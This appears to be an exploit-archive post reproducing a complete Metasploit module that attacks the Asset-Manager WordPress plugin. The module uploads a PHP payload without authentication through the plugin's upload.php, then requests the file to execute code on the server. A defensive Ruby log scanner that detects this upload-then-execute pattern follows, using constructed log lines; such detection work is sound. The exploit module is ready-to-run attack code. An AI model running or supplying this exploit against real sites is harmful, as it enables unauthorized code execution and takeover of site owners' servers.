WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the Asset-Manager WordPress plugin, version 2.0 and below. The plugin allows PHP file uploads: a user can upload a file to a temp directory without authentication, which leads to arbitrary code execution.
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # PhpEXE mixin supplies get_write_exec_payload used below
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored filename on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
```
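As an added defender-side example (not part of the post or of the Metasploit module), the Ruby script below scans web-server access logs for the two requests the module above generates: a POST to asset-manager/upload.php followed, from the same client, by a successful GET of a .php file under wp-content/uploads/assets/temp/. It assumes Apache/nginx combined log format; the log lines are constructed for illustration.

```ruby
# Added example: detect the upload-then-execute chain of the Asset-Manager
# upload.php issue in access logs. Sample log lines are constructed, not real.
require 'time'

UPLOAD_RE = %r{POST \S*/wp-content/plugins/asset-manager/upload\.php}
EXEC_RE   = %r{GET \S*/wp-content/uploads/assets/temp/[^/\s]+\.php}
# Combined log format: ip - - [time] "request" status size "referer" "agent"
LINE_RE   = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<req>[^"]*)" (?<status>\d{3})/

def parse_line(line)
  m = LINE_RE.match(line) or return nil
  { ip: m[:ip], time: Time.strptime(m[:time], '%d/%b/%Y:%H:%M:%S %z'),
    req: m[:req], status: m[:status].to_i }
end

# Returns one alert per client that POSTed to upload.php and then, within
# +window+ seconds, successfully requested a .php file from the temp directory.
def find_upload_exec_chains(lines, window: 300)
  uploads = Hash.new { |h, k| h[k] = [] }
  alerts  = []
  lines.each do |raw|
    e = parse_line(raw) or next
    if e[:req] =~ UPLOAD_RE
      uploads[e[:ip]] << e
    elsif e[:req] =~ EXEC_RE && e[:status] == 200
      prior = uploads[e[:ip]].find { |u| (e[:time] - u[:time]).between?(0, window) }
      alerts << { ip: e[:ip], upload_at: prior[:time], exec: e[:req] } if prior
    end
  end
  alerts
end

SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [26/May/2012:10:00:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 58 "-" "Mozilla/5.0"
  203.0.113.7 - - [26/May/2012:10:00:03 +0000] "GET /wordpress/wp-content/uploads/assets/temp/xkqzp.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
  198.51.100.4 - - [26/May/2012:10:05:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 4090 "-" "Mozilla/5.0"
  198.51.100.4 - - [26/May/2012:10:06:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/a.php HTTP/1.1" 404 200 "-" "Mozilla/5.0"
LOG

if $PROGRAM_NAME == __FILE__
  find_upload_exec_chains(SAMPLE_LOG.lines).each do |a|
    puts "ALERT #{a[:ip]} uploaded at #{a[:upload_at]} then requested #{a[:exec]}"
  end
end
```

Only the first client produces an alert; the .png fetch is ignored and the 404 for a.php is not treated as successful execution.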